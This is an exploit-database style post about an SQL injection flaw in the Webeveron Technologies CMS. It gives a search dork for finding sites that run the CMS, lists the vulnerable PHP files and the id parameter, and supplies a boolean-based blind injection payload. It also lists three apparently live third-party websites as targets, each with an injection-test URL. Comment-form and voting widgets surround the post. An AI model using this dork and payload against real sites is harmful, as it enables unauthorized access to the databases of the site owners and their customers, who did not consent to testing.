Webeveron Technologies cms sql injection vulnerability

2018-01-14 / 2018-01-13

IRANIAN ETHICAL HACKERS (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"Powered By: Webeveron Technologies" inurl:id=

[+] Exploit Title ; Webeveron Technologies cms sql injection vulnerability
[+] Date : 2017-11-13
[+] Author : 0p3n3r From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage :http://www.webeveron.com/
[+] Dork : intext:"Powered By: Webeveron Technologies" inurl:id=
[+] Forum : irethicalhackers.com/forums
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Description :
[!] Webeveron Technologies Is a personal content management
[+] Poc :
[+] Security Level :
[!] High
[+] Exploitation Technique:
[!] Remote
[+] web application technology: Nginx
[+] back-end DBMS: MySQL >= 5.0.12
[+] Vulnerability Files :
[*] view.php
[*] products.php
[*] collection.php
[+] Parameter: id (GET)
[*]Type: boolean-based blind
[*]Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
[*]Payload: id=-1149 OR 3413=3413#
[+] Target :
[!] http://www.rprdesigns.net/collection.php?id=Lace%20Embroidery%27
[!] http://www.eleganceinterio.com/products.php?id=13%27
[!] http://www.travelmint.in/view.php?id=14%27
[+] We Are : Mehrdad_ice [#] 0P3N3R 

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Webeveron Technologies cms sql injection vulnerability

Dork: intext:"Powered By: Webeveron Technologies" inurl:id=

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.